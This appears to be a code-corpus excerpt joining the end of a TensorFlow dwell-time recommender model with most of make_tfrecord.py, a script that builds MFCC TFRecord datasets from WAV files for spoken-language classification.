class ItemRecommender(object):
def __init__(self):
#placeholder
self.sph_user = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_user')
self.sph_doc = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_doc')
self.sph_con = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_con')
self.sph_seed = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_seed')
self.sph_ig = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_ig')
self.ph_dwell_time = tf.compat.v1.placeholder(tf.float32, name='ph_dwell_time')
self.create_graph('m3oe')
diff = tf.reshape(self.ph_dwell_time, [-1]) - tf.reshape(self.output, [-1])
self.loss = tf.reduce_mean(tf.square(diff))
vs = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES, scope='m3oe')
self.grads = tf.clip_by_global_norm(tf.gradients(self.loss, vs), pd['grad_clip'])[0]
with tf.compat.v1.variable_scope('opt'):
optimizer = tf.compat.v1.train.AdamOptimizer(pd['lr'])
self.opt = optimizer.apply_gradients(zip(self.grads, vs))
def field_interact(self, fields):
global g_training
qkv = tf.compat.v1.layers.dropout(fields, rate=pd['dropout'], training=g_training)
with tf.compat.v1.variable_scope('fi'):
return multihead_attention(queries = qkv,
keys = qkv,
values = qkv,
num_heads = pd['head_num'],
dropout_rate = pd['dropout'],
training = g_training,
causality = False,
scope='mha')
def create_graph(self, scope):
global g_training, g_dr
with tf.compat.v1.variable_scope(scope, reuse=tf.compat.v1.AUTO_REUSE):
feat_dict = get_embeddings(g_dr.unique_feature_num(),
pd['feat_dim'],
scope='feat_embedding',
zero_pad=False)
n_batch = pd['batch_size']
n_user, n_doc, n_con = pd['user_field_num'], pd['doc_field_num'], pd['con_field_num']
embed_dim = pd['feat_dim']
user_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_user, sp_weights=None, combiner='mean')
self.user = tf.reshape(user_embed, shape=[n_batch, n_user, embed_dim])
doc_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_doc, sp_weights=None, combiner='mean')
self.doc = tf.reshape(doc_embed, shape=[n_batch, n_doc, embed_dim])
con_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_con, sp_weights=None, combiner='mean')
self.con = tf.reshape(con_embed, shape=[n_batch, n_con, embed_dim])
seed_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_seed, sp_weights=None, combiner='mean')
self.seed = tf.reshape(seed_embed, shape=[n_batch, n_doc, embed_dim])
ig_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_ig, sp_weights=None, combiner='mean')
self.ig = tf.reshape(ig_embed, shape=[n_batch, n_doc, embed_dim])
fi_in = tf.concat([self.doc, self.seed], axis = 1)
#feature interaction network
fi_expert = tf.reshape(self.field_interact(fi_in), shape = [n_batch, -1])
fi_expert = tf.concat([fi_expert,
tf.reshape(self.user, shape=[n_batch, -1]),
tf.reshape(self.con, shape=[n_batch, -1])], axis = 1)
fi_expert = tf.compat.v1.layers.dense(fi_expert, fi_expert.get_shape().as_list()[-1], activation=tf.nn.relu)
fi_expert = tf.compat.v1.layers.dense(fi_expert, pd['expert_dim'], activation=tf.nn.relu)
#sys.exit(0)
edc = tf.reshape(self.doc, shape=[-1, embed_dim])
esd = tf.reshape(self.seed, shape=[-1, embed_dim])
#similarity network
smn0 = tf.multiply(edc, esd)
smn1 = tf.compat.v1.reduce_sum(tf.multiply(edc, esd), axis = 1, keep_dims=True)
smn = tf.reshape(tf.concat([smn0, smn1], axis=1), shape=[n_batch, -1])
sim_expert = tf.concat([smn,
tf.reshape(self.user, shape=[n_batch, -1]),
tf.reshape(self.con, shape=[n_batch, -1])], axis = 1)
sim_expert = tf.compat.v1.layers.dense(sim_expert, pd['expert_dim'], activation=tf.nn.relu)
#information gain network
ig_expert = tf.concat([tf.reshape(self.ig, [n_batch, -1]),
tf.reshape(self.user, [n_batch, -1]),
tf.reshape(self.con, [n_batch, -1])], axis = 1)
ig_expert = tf.compat.v1.layers.dense(ig_expert, pd['expert_dim'], activation=tf.nn.relu)
            #multi-critic
gate_in = tf.concat([tf.reshape(self.user, [n_batch, -1]),
tf.reshape(self.seed, [n_batch, -1]),
tf.reshape(self.con, [n_batch, -1])], axis = 1)
experts = tf.stack([fi_expert, sim_expert, ig_expert], axis = 1)
gates, votes = [], []
for i in range(pd['critic_num']):
gates.append(tf.nn.softmax(tf.compat.v1.layers.dense(gate_in, pd['expert_num'])))
gates[i] = tf.reshape(gates[i], [n_batch, pd['expert_num'], 1])
votes.append(tf.reduce_sum(gates[i] * experts, axis = 1))
votes = tf.stack(votes, axis = 1)
#attention layer
w_init=tf.compat.v1.truncated_normal_initializer(stddev=0.01)
att_x = tf.concat([tf.reshape(self.user, [n_batch, -1]),
tf.reshape(self.doc, [n_batch, -1]),
tf.reshape(self.seed, [n_batch, -1]),
tf.reshape(self.con, [n_batch, -1])], axis = 1)
att_w = tf.compat.v1.get_variable('att_w', (pd['expert_dim'], att_x.get_shape().as_list()[-1]), initializer = w_init)
att_o = tf.tensordot(votes, att_w, [[2],[0]])
att_x = tf.tile(tf.expand_dims(att_x, 1), [1, pd['critic_num'], 1])
att_o = tf.expand_dims(tf.nn.softmax(tf.reduce_sum(att_o * att_x, 2)), -1)
vote_ret = tf.reduce_sum(att_o * votes, axis = 1)
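            # Shape walk-through (added for readability): `votes` holds one gated expert mixture per critic,
            # i.e. [batch, critic_num, expert_dim]; `att_x`/`att_o` build a softmax weight per critic of shape
            # [batch, critic_num, 1], and `vote_ret` pools the critic votes back down to [batch, expert_dim].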
            fc = tf.compat.v1.layers.dropout(tf.compat.v1.layers.dense(vote_ret, vote_ret.get_shape().as_list()[-1] // 2, activation=tf.nn.relu),
rate = pd['dropout'],
training = g_training)
self.output = tf.compat.v1.layers.dense(fc, 1, activation=tf.nn.relu)
#call for evaluation
def predict(self, sess, ph_dict):
return sess.run(self.output, feed_dict={self.sph_user : ph_dict['user'],
self.sph_doc : ph_dict['doc'],
self.sph_con : ph_dict['con'],
self.sph_seed : ph_dict['seed'],
self.sph_ig : ph_dict['ig'],
self.ph_dwell_time : ph_dict['reward']})
#call for learning from data
def learn(self, sess, ph_dict):
loss, _ = sess.run([self.loss, self.opt], feed_dict={self.sph_user : ph_dict['user'],
self.sph_doc : ph_dict['doc'],
self.sph_con : ph_dict['con'],
self.sph_seed : ph_dict['seed'],
self.sph_ig : ph_dict['ig'],
self.ph_dwell_time : ph_dict['reward']})
global g_loss_sum, g_loss_cnt
g_loss_sum += np.mean(loss)
g_loss_cnt += 1
def sigmoid(x):
return 1.0 / (1.0 + math.exp(max(min(-x, 1e2), -1e2)))
def handle(sess, net, sess_data):
def gen_sparse_tensor(fs):
global g_dr
kk, vv = [], []
for i in range(len(fs)):
ff = fs[i]
assert(isinstance(ff, set))
ff = list(ff)
for k in range(len(ff)):
kk.append(np.array([i, k], dtype=np.int32))
vv.append(ff[k])
return tf.compat.v1.SparseTensorValue(kk, vv, [len(fs), g_dr.unique_feature_num()])
if len(sess_data) != pd['batch_size']:
return
user, doc, con, seed, dwell = [], [], [], [], []
for i in range(len(sess_data)):
user.append(sess_data[i][0])
doc.append(sess_data[i][1])
con.append(sess_data[i][2])
seed.append(sess_data[i][3])
dwell.append(sess_data[i][4])
phd = {}
#print np.array(user).shape
user = np.array(user).reshape(pd['batch_size']*pd['user_field_num'])
phd['user'] = gen_sparse_tensor(user)
doc = np.array(doc).reshape(pd['batch_size']*pd['doc_field_num'])
phd['doc'] = gen_sparse_tensor(doc)
seed = np.array(seed).reshape(pd['batch_size']*pd['doc_field_num'])
phd['seed'] = gen_sparse_tensor(seed)
ig = []
for i in range(doc.shape[0]):
ig.append({0} if doc[i] <= seed[i] else doc[i] - seed[i])
ig = np.array(ig).reshape(pd['batch_size']*pd['doc_field_num'])
phd['ig'] = gen_sparse_tensor(ig)
con = np.array(con).reshape(pd['batch_size']*pd['con_field_num'])
phd['con'] = gen_sparse_tensor(con)
phd['reward'] = dwell
global g_training
if g_training:
#train network
net.learn(sess, phd)
else:
#evaluate network
qout = net.predict(sess, phd).reshape([-1])
global g_working_mode
for i in range(len(dwell)):
if 'local_predict' == g_working_mode:
print('%s %s' % (dwell[i], qout[i]))
def work():
sess = tf.compat.v1.Session()
#build networks
net = ItemRecommender()
saver = tf.compat.v1.train.Saver(max_to_keep=1)
g_init_op = tf.compat.v1.global_variables_initializer()
if os.path.exists('./ckpt') and len(os.listdir('./ckpt')):
model_file = tf.train.latest_checkpoint('./ckpt')
saver.restore(sess, model_file)
else:
sess.run(g_init_op)
os.system('mkdir ckpt')
global g_loss_sum, g_loss_cnt, g_dr
last_epoch_loss = 1e2
for k in range(pd['num_epochs']):
if k > 0:
g_dr.load('sample.data')
data = g_dr.next()
batch_cnt = 0
while data is not None:
handle(sess, net, data)
data = g_dr.next()
batch_cnt += 1
if g_training and batch_cnt % 10 == 0:
print('>>>Average Loss --- epoch %d --- batch %d --- %f' % (k, batch_cnt, g_loss_sum / (g_loss_cnt + 1e-6)))
print('>>>Average Loss --- epoch %d --- batch %d --- %f' % (k, batch_cnt, g_loss_sum / (g_loss_cnt + 1e-6)))
        # guard against division by zero when no training batches were processed (e.g. predict mode)
        if g_loss_sum / (g_loss_cnt + 1e-6) > last_epoch_loss:
            print('Job Finished!')
            break
        else:
            last_epoch_loss = g_loss_sum / (g_loss_cnt + 1e-6)
saver.save(sess, 'ckpt/m3oe.ckpt')
if __name__ == '__main__':
g_dr.load('sample.data')
if g_working_mode == 'local_train':
g_training = True
elif g_working_mode == 'local_predict':
g_training = False
else:
raise Exception('invalid working mode')
work()
| 48.896414 | 142 | 0.547869 |
b7f00dce471a6f794f56174339f75e9015bea098
| 29,523 |
py
|
Python
|
python/en/archive/dropbox/ec2-oregon/make_tfrecord.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/make_tfrecord.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/make_tfrecord.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
make_tfrecord.py
"""
import os
import sys
import numpy as np
import tensorflow as tf
import resampy
import pickle
import librosa
import datetime
from scipy.io import wavfile
from python_speech_features import mfcc
LANGUAGE_LABELS = {'english':0, 'korean':1, 'japanese':2, 'chinese':3, 'spanish':4, 'french':5, 'german':6, 'italian':7}
class multi_print():
def __init__(self, stdouts, orig_stdout):
self.stdouts = stdouts
self.orig_stdout = orig_stdout
def __call__(self, sentence, end='\n'):
for _stdout in self.stdouts:
sys.stdout = _stdout
print(sentence, flush=True, end=end)
sys.stdout = self.orig_stdout
class MakeTFRecord():
def __init__(self, sampling_rate, window_size, window_step, t_min, t_max, n_features,
data_path_tr_val, meta_path_tr_val, n_tot_data_tr_val, valid_rate,
data_path_test, meta_path_test, n_tot_data_test,
tfr_path, tfr_path_trn, tfr_path_val, tfr_path_test, tfr_path_info,
overwrite_tr_val=False, overwrite_test=False,
multi_print=print):
self.window_size = window_size
self.window_step = window_step
self.data_min_time = t_min
self.data_max_time = t_max
self.n_features = n_features
self.valid_rate = valid_rate
self.fs = sampling_rate
self.data_path_tr_val = data_path_tr_val
self.meta_path_tr_val = meta_path_tr_val
self.n_tot_data_tr_val = n_tot_data_tr_val
self.data_path_test = data_path_test
self.meta_path_test = meta_path_test
self.n_tot_data_test = n_tot_data_test
self.tfr_path = tfr_path
self.tfr_path_trn = tfr_path_trn
self.tfr_path_val = tfr_path_val
self.tfr_path_test = tfr_path_test
self.tfr_path_info = tfr_path_info
self.overwrite_tr_val = overwrite_tr_val
self.overwrite_test = overwrite_test
self.n_aug = 0
self.feat_mean_set = []
self.feat_std_set = []
self.feat_mean_set_aug = []
self.feat_std_set_aug = []
self.available_aug_idx = []
self.mprint = multi_print
self.label_in_dataset = []
self.make_trn_val_data = False
self.make_test_data = False
def make_trn_val_tfrecord(self):
if os.path.exists(self.tfr_path_trn) and os.path.exists(self.tfr_path_val) and not self.overwrite_tr_val:
self.mprint(Warning('Train, Validation TFRecord is already exists.\nTrain path: %s\nValid path: %s'%(self.tfr_path_trn, self.tfr_path_val)))
else:
if self.overwrite_tr_val:
self.mprint('[WARNING] Overwriting train, validation dataset')
if not len(self.n_tot_data_tr_val) == len(self.meta_path_tr_val):
self.mprint('# of dataset != # of meta dir, dataset:%d, meta dir:%d'
%(len(self.meta_path_tr_val), len(self.n_tot_data_tr_val)))
self.n_tot_data_tr_val = [self.n_tot_data_tr_val[0]]*len(self.meta_path_tr_val)
file_paths, labels, data_shape, valid_idx, error_msg = self.load_files(self.data_path_tr_val,
self.meta_path_tr_val,
self.n_tot_data_tr_val,
'Train, Valid')
valid_file_paths = np.array(file_paths)[valid_idx]
valid_labels = np.array(labels)[valid_idx]
valid_data_shape = np.array(data_shape)[valid_idx]
trn_file_paths = np.delete(file_paths, valid_idx, axis=0)
trn_labels = np.delete(labels, valid_idx, axis=0)
trn_data_shape = np.delete(data_shape, valid_idx, axis=0)
            # The shuffle_idx handling here could probably be removed
shuffle_idx = np.random.choice(len(trn_file_paths), size=len(trn_file_paths), replace=False)
            # Everything below this point is needed
self.trn_file_paths = np.array(trn_file_paths)[shuffle_idx]
self.trn_labels = np.array(trn_labels)[shuffle_idx]
self.trn_data_shape = np.array(trn_data_shape)[shuffle_idx]
assert len(self.trn_file_paths) == len(self.trn_labels) == len(self.trn_data_shape), \
'not equal: %s, %s, %s'%(len(self.trn_file_paths), len(self.trn_labels), len(self.trn_data_shape))
            # The shuffle_idx handling here could probably be removed
shuffle_idx = np.random.choice(len(valid_file_paths), size=len(valid_file_paths), replace=False)
            # Everything below this point is needed
self.valid_file_paths = np.array(valid_file_paths)[shuffle_idx]
self.valid_labels = np.array(valid_labels)[shuffle_idx]
self.valid_data_shape = np.array(valid_data_shape)[shuffle_idx]
assert len(self.valid_file_paths) == len(self.valid_labels) == len(self.valid_data_shape), \
'not equal: %s, %s, %s'%(len(self.valid_file_paths), len(self.valid_labels), len(self.valid_data_shape))
self.mprint('trn dataset: %d, validation dataset: %d'
%(len(self.trn_file_paths), len(self.valid_file_paths)))
save_txt_path = os.path.join(self.tfr_path, 'trn_data_list.txt')
self.save_txt(save_txt_path, "\n".join(self.trn_file_paths[:]), 'Save train data list in %s' %(save_txt_path))
save_txt_path = os.path.join(self.tfr_path, 'trn_data_label_list.txt')
self.save_txt(save_txt_path, "\n".join(np.array(self.trn_labels[:], dtype=np.str)), 'Save train data label list in %s' %(save_txt_path))
save_txt_path = os.path.join(self.tfr_path, 'val_data_list.txt')
self.save_txt(save_txt_path, "\n".join(self.valid_file_paths[:]), 'Save validation data list in %s' %(save_txt_path))
if not len(error_msg) == 0:
save_txt_path = os.path.join(self.tfr_path, 'data_error_msg_trn_val.txt')
self.save_txt(save_txt_path, "\n".join(error_msg), 'Save error msg for trn/valid dataset in %s' %(save_txt_path))
self.make_tfrecord(self.tfr_path_trn, self.trn_file_paths, self.trn_labels, mode='Train')
self.make_tfrecord(self.tfr_path_val, self.valid_file_paths, self.valid_labels, mode='Valid')
self.trn_mean = np.mean(self.feat_mean_set, axis=0)
self.trn_std = np.std(self.feat_std_set, axis=0)
self.n_trn = len(self.trn_file_paths)
self.n_valid = len(self.valid_file_paths)
self.make_trn_val_data = True
        # Done up to here...
def make_test_tfrecord(self):
if os.path.exists(self.tfr_path_test) and not self.overwrite_test:
self.mprint(Warning('Test TFRecord is already exists.\nTest path: %s\n'
%(self.tfr_path_test)))
else:
if self.overwrite_test:
self.mprint('[WARNING] Overwriting test dataset')
if not len(self.n_tot_data_test) == len(self.meta_path_test):
self.mprint('# of dataset != # of meta dir, dataset:%d, meta dir:%d'
%(len(self.meta_path_test), len(self.n_tot_data_test)))
self.n_tot_data_test = [self.n_tot_data_test[0]]*len(self.meta_path_test)
file_paths, labels, data_shape, _, error_msg = self.load_files(self.data_path_test,
self.meta_path_test,
self.n_tot_data_test,
'Test')
shuffle_idx = np.random.choice(len(file_paths), size=len(file_paths), replace=False)
self.test_file_paths = np.array(file_paths)[shuffle_idx]
self.test_labels = np.array(labels)[shuffle_idx]
self.test_data_shape = np.array(data_shape)[shuffle_idx]
if not len(error_msg) == 0:
save_txt_path = os.path.join(self.tfr_path, 'data_error_msg_test.txt')
self.save_txt(save_txt_path, "\n".join(error_msg),
'Save error msg for test dataset in %s' %(save_txt_path))
self.make_tfrecord(self.tfr_path_test, self.test_file_paths, self.test_labels, mode='test')
label2language = [key for label in self.test_labels for key, val in LANGUAGE_LABELS.items() if label == val]
testdata_language = np.unique(label2language)
self.n_test = len(self.test_file_paths)
for language in testdata_language:
self.mprint('# of test dataset: %d, language: %s'
%(int(np.sum(np.array(label2language)==language)), language))
self.make_test_data = True
def make_augment_tfrecord(self, tfr_path_aug, aug_type='wn', aug_rate=1, overwrite_aug=False):
self.aug_type = aug_type
self.aug_rate = aug_rate
if os.path.exists(tfr_path_aug) and not overwrite_aug:
self.mprint(Warning('Augmentation TFRecord is already exists.\nAugmentation path: %s'
%(tfr_path_aug)))
else:
if overwrite_aug:
self.mprint('[WARNING] Overwriting augmented dataset')
if not self.make_trn_val_data:
saved_txt_path = os.path.join(self.tfr_path, 'trn_data_list.txt')
self.trn_file_paths = self.read_txt(saved_txt_path, 'Load train data list from %s' %(saved_txt_path))
saved_txt_path = os.path.join(self.tfr_path, 'trn_data_label_list.txt')
self.trn_labels = self.read_txt(saved_txt_path, 'Load train data label list from %s' %(saved_txt_path))
if not type(self.trn_labels[0]) == int:
self.trn_labels = np.array(self.trn_labels, dtype=np.int16)
with open(self.tfr_path_info, 'rb') as f:
_data_info = pickle.load(f)
self.trn_data_shape = _data_info['trn_data_shape']
self.make_tfrecord(tfr_path_aug, self.trn_file_paths, self.trn_labels, 'Augmentation')
self.trn_aug_data_shape = self.trn_data_shape[np.array(self.available_aug_idx)]
self.trn_aug_mean = np.mean(self.feat_mean_set_aug, axis=0)
self.trn_aug_std = np.std(self.feat_std_set_aug, axis=0)
def load_files(self, data_path, meta_path, n_data, mode=None):
file_paths, file_labels, data_shape, file_info, error_msg= [],[],[],[],[]
self.mprint('%s data checking..' %mode)
for _idx, _meta_path in enumerate(meta_path):
_file_paths, _file_labels, _data_shape = [],[],[]
_len_error_msg = len(error_msg)
_len_file_paths = len(file_paths)
_dataset_name = os.path.basename(_meta_path).split('.txt')[0]
_file_dir = os.path.join(data_path, _dataset_name)
_language = _dataset_name.split('_')[0]
if not mode == 'Test':
_label_check = LANGUAGE_LABELS[_language]
self.label_in_dataset.append(_label_check)
with open(_meta_path, 'r') as f:
_meta_data = f.read().splitlines()
self.mprint('[%s] Load meta data from %s and data from %s'
%(_language, _dataset_name, _file_dir))
np.random.shuffle(_meta_data)
_data_len_check = len(_meta_data) >= n_data[_idx]
_max_len = n_data[_idx] if _data_len_check else len(_meta_data)
progress = Progress(_max_len, 20)
while len(_file_paths) < _max_len:
try:
_fname, _label = _meta_data.pop().split(" ")
if not mode == 'Test':
assert int(_label) == _label_check, \
"label of %s is %d, but data is labeled as %d" \
%(_file_paths, _label_check, int(_label))
else:
assert int(_label) in self.label_in_dataset, \
"label of %s is %d, but train dataset is only available %s" \
%(_file_paths, int(_label), self.label_in_dataset)
except:
break
_file_path = os.path.join(_file_dir, _fname)
_fs, _wav_data = wavfile.read(_file_path)
if not _fs == self.fs:
_wav_data = resampy.resample(_wav_data, _fs, self.fs)
error_msg.append('[(Warning) Sampling rate error] Sampling Rate is required 16kHz, file: %s has %dHz' \
%(_file_path, _fs))
if not mode == 'Test':
_check_result = self.data_check(_wav_data, _file_path, error_msg)
                    # During training, validate the data before including it in the training set
else:
_check_result = True
                    # During testing, include every sample
if _check_result:
_file_paths.append(_file_path)
_data_shape.append([len(_wav_data)/_fs, self.window_size*_fs, int(_label)])
_file_labels.append(int(_label))
                    # When logging to the text file, the progress bar is written only at 0, 0.25, 0.50, 0.75 and 1.0 of the total.
                    # This is needed because each write starts a new line in the text file, so the number of writes is limited.
if len(_file_paths) == 1 or len(_file_paths) == int(_max_len*0.25) or len(_file_paths) == int(_max_len*0.5) or len(_file_paths) == int(_max_len*0.75) or len(_file_paths) == int(_max_len-1):
progress(_dataset_name, len(_file_paths), len(error_msg)-_len_error_msg, _print=self.mprint)
                    # This branch prints to the command line.
else:
progress(_dataset_name, len(_file_paths), len(error_msg)-_len_error_msg)
# end of while
if not len(_file_paths) == _max_len:
self.mprint(' Expected: %d, but get: %d' %(_max_len, len(_file_paths)))
if mode == 'Train, Valid':
_n_valid = int(len(_file_paths) * self.valid_rate)
                # _len_file_paths is 0 at this point; not entirely sure why it is needed...
                # Important: train vs. validation data is randomized per dataset (e.g. an 80:20 split for each dataset), not over the pooled data.
                # _len_file_paths is used as the offset.
_valid_idx = np.random.choice(len(_file_paths), size=_n_valid, replace=False) + _len_file_paths # validation dataset index
file_info.extend(_valid_idx)
file_paths.extend(_file_paths)
file_labels.extend(_file_labels)
data_shape.extend(_data_shape)
# end of for
return file_paths, file_labels, data_shape, file_info, error_msg
def data_check(self, _wav_data, _file_path, _error_msg):
_rec_time = len(_wav_data)/self.fs
if not _wav_data.dtype == np.int16:
_error_msg.append('[Bits] wavfile is %s \n' %(type(_wav_data)))
return False
if not 50 < np.std(_wav_data):
_error_msg.append('[Silence] mean: %.3f, std: %.3f check %s \n' \
%(np.mean(_wav_data), np.std(_wav_data), _file_path))
return False
if _rec_time < self.data_min_time:
_error_msg.append('[Minimum recording time] Recording time of %s is too short, %.3f \n' \
%(_file_path, _rec_time))
return False
if _rec_time > self.data_max_time:
_error_msg.append('[Maximum recording time] Recording time of %s is too long, %.3f \n' \
%(_file_path, _rec_time))
return False
return True
def make_tfrecord(self, tfr_path, file_path, labels, mode=None):
dataset = zip(file_path, labels)
options = tf.python_io.TFRecordOptions(compression_type=tf.python_io.TFRecordCompressionType.GZIP)
writer = tf.python_io.TFRecordWriter(path=tfr_path, options=options)
self.mprint('[%s] Make TFRecord files..' %mode)
_max_progress = len(file_path)
progress = Progress(_max_progress, 20)
for _idx, (_file_path, _label) in enumerate(dataset):
_fs, _wav_data = wavfile.read(_file_path)
if not _fs == self.fs:
_wav_data = resampy.resample(_wav_data, _fs, self.fs)
if mode == 'Augmentation':
                _error_msg = [] # not used
if self.aug_type == 'wn':
aug = self.adding_white_noise
elif self.aug_type == 'stretch':
aug = self.stretching
_wav_data = aug(_wav_data, _fs, self.aug_rate) # 0.01 ~ 0.005
_data_check = self.data_check(_wav_data, _file_path, _error_msg)
if _data_check:
_splited_data, _seq_length = self.split_frame(_wav_data, _fs, winfunc=np.hamming)
_feat_data, _mfcc_seq_length = self.mfcc_extractor(_wav_data, _fs)
assert _seq_length == _mfcc_seq_length, \
'calculated sequence length: %d, mfcc sequence length: %d, check: %s' \
%(_seq_length, _mfcc_seq_length, _file_path)
self.write_sequence_tfrecords(writer, _wav_data, _splited_data, _feat_data, _label, _seq_length)
self.n_aug += 1
self.available_aug_idx.append(_idx)
self.feat_mean_set_aug.append(np.mean(_feat_data, axis=0))
self.feat_std_set_aug.append(np.std(_feat_data, axis=0))
else:
_splited_data, _seq_length = self.split_frame(_wav_data, _fs, winfunc=np.hamming)
_feat_data, _mfcc_seq_length = self.mfcc_extractor(_wav_data, _fs)
assert _seq_length == _mfcc_seq_length, \
'calculated sequence length: %d, mfcc sequence length: %d, check: %s' \
%(_seq_length, _mfcc_seq_length, _file_path)
self.write_sequence_tfrecords(writer, _wav_data, _splited_data, _feat_data, _label, _seq_length)
if mode == 'Train':
self.feat_mean_set.append(np.mean(_feat_data, axis=0))
self.feat_std_set.append(np.std(_feat_data, axis=0))
if _idx == 0 or _idx == int(_max_progress*0.25) or _idx == int(_max_progress*0.5) or _idx == int(_max_progress*0.75) or _idx == int(_max_progress-1):
progress('%s' %mode, _idx+1, _print=self.mprint)
else:
progress('%s' %mode, _idx+1)
writer.close()
def write_sequence_tfrecords(self, writer, wav_data, raw_data, feat_data, label, seq_len):
_wav_data = np.array(wav_data).tostring()
_raw_data = np.array(raw_data).tostring()
_feat_data = np.array(feat_data).tostring()
example_sequence = tf.train.SequenceExample()
example_sequence.context.feature['label'].int64_list.value.append(label)
example_sequence.context.feature['sequence_length'].int64_list.value.append(seq_len)
fl_wav_data = example_sequence.feature_lists.feature_list['wav_data']
fl_raw_data = example_sequence.feature_lists.feature_list['raw_data']
fl_feat_data = example_sequence.feature_lists.feature_list['feat_data']
fl_wav_data.feature.add().bytes_list.value.append(_wav_data)
fl_raw_data.feature.add().bytes_list.value.append(_raw_data)
fl_feat_data.feature.add().bytes_list.value.append(_feat_data)
writer.write(example_sequence.SerializeToString())
def mfcc_extractor(self, _wav_data, _fs):
_mfcc_data = list(mfcc(_wav_data, self.fs, numcep=self.n_features, nfilt=self.n_features, winlen=self.window_size, winstep=self.window_step, winfunc=np.hamming))
assert np.shape(_mfcc_data)[1] == self.n_features
_seq_length = np.shape(_mfcc_data)[0]
return _mfcc_data, _seq_length
def split_frame(self, _wav_data, _fs, winfunc=lambda x:np.ones((x,))):
slen = len(_wav_data)
frame_len = int(self.window_size*self.fs)
frame_step = int(self.window_step*self.fs)
if slen <= frame_len:
numframes = 1
else:
numframes = 1 + int(np.ceil((1.0*slen - frame_len)/frame_step))
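        # Worked example (flag defaults above): with fs=16000, window_size=0.025 and window_step=0.01,
        # a 1 s clip (slen=16000) gives frame_len=400 and frame_step=160, so
        # numframes = 1 + ceil((16000 - 400) / 160) = 1 + 98 = 99 frames.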
padlen = int((numframes-1)*frame_step + frame_len)
zeros = np.zeros((padlen - slen,))
padsignal = np.concatenate((_wav_data, zeros))
indices = np.tile(np.arange(0, frame_len),(numframes,1)) + np.tile(np.arange(0,numframes*frame_step,frame_step),(frame_len,1)).T
indices = np.array(indices, dtype=np.int32)
frames = padsignal[indices]
win = np.tile(winfunc(frame_len),(numframes,1))
new_frames = frames*win
_seq_length = len(new_frames)
return new_frames, _seq_length
def adding_white_noise(self, data, fs, rate): # 0.001 ~ 0.005
_data = data / 32768.0
wn = np.random.randn(len(data))
data_wn = np.int16((_data + rate*wn) * 32768.0)
return data_wn
def stretching(self, data, fs, rate): # 0.8, 0.9, 1.1, 1.2
_data = data / 32768.0
data_stretching = np.int16(librosa.effects.time_stretch(_data, rate) * 32768.0)
return data_stretching
def save_txt(self, path, data, print_msg=None):
if not print_msg == None:
self.mprint(print_msg)
with open(path, 'wt') as f:
f.writelines(data)
def read_txt(self, path, print_msg=None):
if not print_msg == None:
self.mprint(print_msg)
with open(path, 'rt') as f:
data = f.read().splitlines()
return data
class Progress():
def __init__(self, max_iter, _max_bar=50):
self.max_iter = max_iter
self.max_bar = _max_bar
self.iter_digit = int(np.log10(max_iter))+1
def __call__(self, language, current_iter, n_error_file=None, _print=sys.stdout.write):
step = int(round(current_iter/self.max_iter * self.max_bar))
percent = current_iter/self.max_iter* 100
bar = '%8.3f%% |' %percent + '#' * step + ' ' * (self.max_bar - step) + '|'
if not n_error_file == None:
_print(('\r[%s] [%'+'%dd]'%self.iter_digit + '%s [# of error file: %d]') %(language, current_iter, bar, n_error_file))
else:
_print(('\r[%s] [%'+'%dd]'%self.iter_digit + '%s') %(language, current_iter, bar))
if self.max_iter == current_iter:
_print('\n')
# sys.stdout.flush()
if __name__ == "__main__":
flags = tf.app.flags
flags.DEFINE_string("data_dir", "/home/taehwan/Documents/Data/Speech/voxforge/data", "Traing dataset directory.")
flags.DEFINE_string("dataset", "english_giga,korean_giga", "Dataset name.")
flags.DEFINE_string("datatype", "wavfiles", "Type of dataset. default: wavfiles")
flags.DEFINE_string("dataset_test", "english_LCD,korean_LCD", "Dataset for test")
flags.DEFINE_string('tfr_dir_name', 'tfrecord', "Directory of TFRecord files.")
flags.DEFINE_string("n_trn_data", '100', "Total number of training and validation data. default: 100")
flags.DEFINE_string("n_test_data", '10', "Number of maximum test data. If test dataset is less than maximum test data, then use all test dataset during testing phase. default: 10")
flags.DEFINE_bool('data_aug', False, "Data augmentation")
flags.DEFINE_string('aug_type', 'stretch', 'Augmentation type. wn, stretch')
flags.DEFINE_float('aug_rate', 1.1, 'Augmentation rate. Recommand: [0.01, 0.008, 0.005] for wn, [0.8, 0.9, 1.1, 1.2] for stretch ')
flags.DEFINE_float('window_size', 0.025, 'Window size for each frame')
flags.DEFINE_float('window_step', 0.01, 'Window step')
flags.DEFINE_integer('fs', 16000, 'Sampling rate of wavfiles')
flags.DEFINE_float('T_min', 0.5, 'Minimum time of wavfile')
flags.DEFINE_float('T_max', 10, 'Maximum time of wavfile')
flags.DEFINE_float('valid_rate', 0.2, 'Rate of Validation data. n_trn_data*valid_rate: number of validation dataset')
flags.DEFINE_integer('n_mfcc_feat', 26, 'Feature dimensions of MFCC. default: 26(maximum)')
flags.DEFINE_bool('overwrite', False, "Overwrite train/valid tfrecord")
flags.DEFINE_bool('overwrite_test', False, "Overwrite test tfrecord")
flags.DEFINE_bool('overwrite_aug', False, "Overwrite augmentation tfrecord")
flags.DEFINE_string('add_log', '', 'Add someting to TFRecord directory name')
conf = flags.FLAGS
dataset = conf.dataset.replace(" ", "").split(',')
dataset_char = "".join(['%c' %i[0] for i in dataset])
dataset_test = conf.dataset_test.replace(" ", "").split(',')
dataset_type = conf.datatype
T_min = conf.T_min
T_max = conf.T_max
n_features = conf.n_mfcc_feat
data_dir = os.path.join(conf.data_dir, dataset_type)
meta_dir = [os.path.join(conf.data_dir, 'meta', '%s.txt' %(_data)) for _data in dataset]
